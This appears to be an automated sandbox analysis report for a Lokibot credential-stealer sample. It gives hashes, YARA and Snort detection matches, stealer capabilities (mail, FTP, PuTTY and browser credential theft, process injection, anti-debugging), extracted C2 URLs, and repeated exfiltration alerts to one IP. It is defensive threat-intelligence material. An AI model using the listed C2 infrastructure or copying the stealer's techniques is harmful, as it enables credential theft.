Loading ...

Play interactive tourEdit tour

Windows Analysis Report U001P56ybm.exe

Overview

General Information

Sample Name:U001P56ybm.exe
Analysis ID:528740
MD5:969e2ccfcacf3573de922d9bce81e3fd
SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • U001P56ybm.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
    • U001P56ybm.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 36 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.0.U001P56ybm.exe.400000.6.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13e78:$s1: http://
        • 0x17633:$s1: http://
        • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13e80:$s2: https://
        • 0x13e78:$f1: http://
        • 0x17633:$f1: http://
        • 0x13e80:$f2: https://
        2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            2.0.U001P56ybm.exe.400000.6.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              2.0.U001P56ybm.exe.400000.6.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 82 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: U001P56ybm.exeReversingLabs: Detection: 25%
              Antivirus detection for URL or domainShow sources
              Source: http://194.85.248.167/imt/fre.phpAvira URL Cloud: Label: malware
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dllReversingLabs: Detection: 22%
              Source: 2.0.U001P56ybm.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
              Source: U001P56ybm.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49744 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49745 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49746
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49747
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49748
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49749
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49750
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49751 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49751
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49752
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49755
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49756
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49757
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49758
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49759
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49760
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49761
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49762
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49763
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49765 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49765
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49766 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49766
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49769 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49769
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49770 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49770
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49785 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49785
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49809 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49809
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49813 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49813
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49814 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49814
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49817 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49817
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49818 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49818
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49819 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49819
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49820 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49820
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49821 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49821
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49822 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49822
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49823 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49823
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49825 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49825
